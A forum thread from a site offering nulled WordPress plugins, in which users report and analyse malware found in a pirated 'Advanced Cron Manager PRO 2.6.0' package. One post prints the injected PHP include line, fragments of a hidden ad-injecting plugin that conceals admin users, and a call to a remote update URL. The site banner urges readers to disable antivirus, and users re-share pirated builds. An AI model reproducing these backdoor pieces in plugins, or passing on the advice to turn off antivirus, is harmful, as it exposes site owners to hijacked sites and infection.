• You MUST read the Babiato Rules before making your first post otherwise you may get permanent warning points or a permanent Ban.

Our resources on Babiato Forum are CLEAN and SAFE. So you can use them for development and testing purposes. If your are on Windows and have an antivirus that alerts you about a possible infection: Know it's a false positive because all scripts are double checked by our experts. We advise you to add Babiato to trusted sites/sources or disable your antivirus momentarily while downloading a resource. "Enjoy your presence on Babiato"

Advanced Cron Manager PRO

Advanced Cron Manager PRO 2.6.0

No permission to download

cheraghestan

Banned User
Jun 10, 2019
cheraghestan submitted a new resource:

Advanced Cron Manager PRO - Cron

With Advanced Cron Manager PRO you will get premium Cron logger! Investigate Cron executions with no hassle!

See below its features which will help you take a look what’s going on in your Cron system. With Advanced Cron Manager PRO you can:

• Log WP Cron executions
    • Catch WP Cron fatal errors
    • acm-pro.png Catch Warnings and Notices
    • Reschedule Events to different times
    • Log Performance (memory usage and execution time)
    • Track delays (in milliseconds)...

Read more about this resource...

Malware ALERT!​

I DIDN'T RECEIVE AN ALERT ON ANY OTHER BABIATO DOWNLOADS EXCEPT THIS.

Advanced Cron Manager PRO 2.6.0

2.6.0 - - - Apr 27, 2023

Prevented downloading of a dangerous object​

Prevented downloading of a malicious file or other object designed to infect your computer with malware that will slow it down, break the system or lead to other problems.

You were protected from downloading this object by Kaspersky security. You can close this window with no risk.

Detected at: 27-04-2023 21:50:50

Web address: https://babia.to/attachments/advanc...196631/?sess=36e09e99f9e419ff73c3af3163583c4c

Reason: object is infected HEUR:Trojan.PHP.ShowAd.gen

Last edited:
Reactions: deo
@Babak REMOVE THE PLUGIN. It fucked my site really bad. FULL of viruses! I have now to reconstruct the whole website.

L.e. if you want to risk to install it, do a backup before. Luckily I had a backup that solved the problem. Deffo not trying again this version.

Last edited:
Compromised plugin

Details:
This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <?php if (file_exists(dirname(__FILE__) . '/class.plugin-modules.php')) include_once(dirname(__FILE__) . '/class.plugin-modules.php'); ?><?
/wp-content/plugins/mplugin.php
File Type: Not a core, theme, or plugin file from wordpress.org.

Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <?php\x0a/**\x0a * Plugin Name: Monetization Code plugin\x0a * Description: mplugin Shows cusom codes to display your ad codes.\x0a * Author: aerin Singh\x0a * Version: 1.0\x0a */\x0aerror_reporting(0);\x0aini_set('display_e...
The issue type is: Backdoor:pHP/register.hideadmin.8724
Description: Code used to hide admin users. Often used in malicious plugins and scripts

Reactions: Unreal_NFS and deo
I took a close look at this package (Advanced Cron Manager PRO 2.6.0).

Two files...
  1. advanced-cron-manager-pro.php
  2. inc/Abstracts/Tracker.php
Have this added php at the top of their files:
PHP:
<?php if (file_exists(dirname(__FILE__) . '/class.plugin-modules.php')) include_once(dirname(__FILE__) . '/class.plugin-modules.php'); ?>

Which triggers that named file (class.plugin-modules.php) to run the nasty stuff.

lots of sh** like this:
  • Code:
    define('HEADER_PLUGIN_NAME', 'Plugin Name: Monetization Code plugin');
  • Code:
    define('HEADER_PLUGIN_DESCRIPTION', 'Description: mplugin Shows cusom codes to display your ad codes.');
  • Code:
    @file_get_contents("http://www.homndo.com/update.php")
It looks like it will inject ads, but hide them from any admin accounts which it recognises by logging the IP of Admin accounts.

Well I cleaned it up and scanned with Virustotal. Looks clean, however I don't think it's wise for anyone to install plugins which have been previously hacked, but I have provided it here for anyone who wants to try it.

1685046099284.png

Attachments

• advanced-cron-manager-pro-2.6.0-am.zip
    104.8 KB · Views: 23
Reactions: simorg67 and xsz
I just download it from Rankerfox/ Creativsea this is 2.5.3 version,
looks like no virus and its working.

For the admin, not sure about all the rule of the forum, hope is fine

1693720948554.png

Attachments

• advanced-cron-manager-pro-2.5.3.zip
    103.4 KB · Views: 19
Reactions: tomi500

• [Fixed] PHP 8.2 deprecations with dynamic class props.
  • [Added] License activation prompt.
  • [Added] PHP 8.2 compatibility.

AdBlock Detected

We get it, advertisements are annoying!

However in order to keep our huge array of resources free of charge we need to generate income from ads so to use the site you will need to turn off your adblocker.

If you'd like to have an ad free experience you can become a Babiato Lover by donating as little as $5 per month. Click on the Donate menu tab for more info.

I've Disabled AdBlock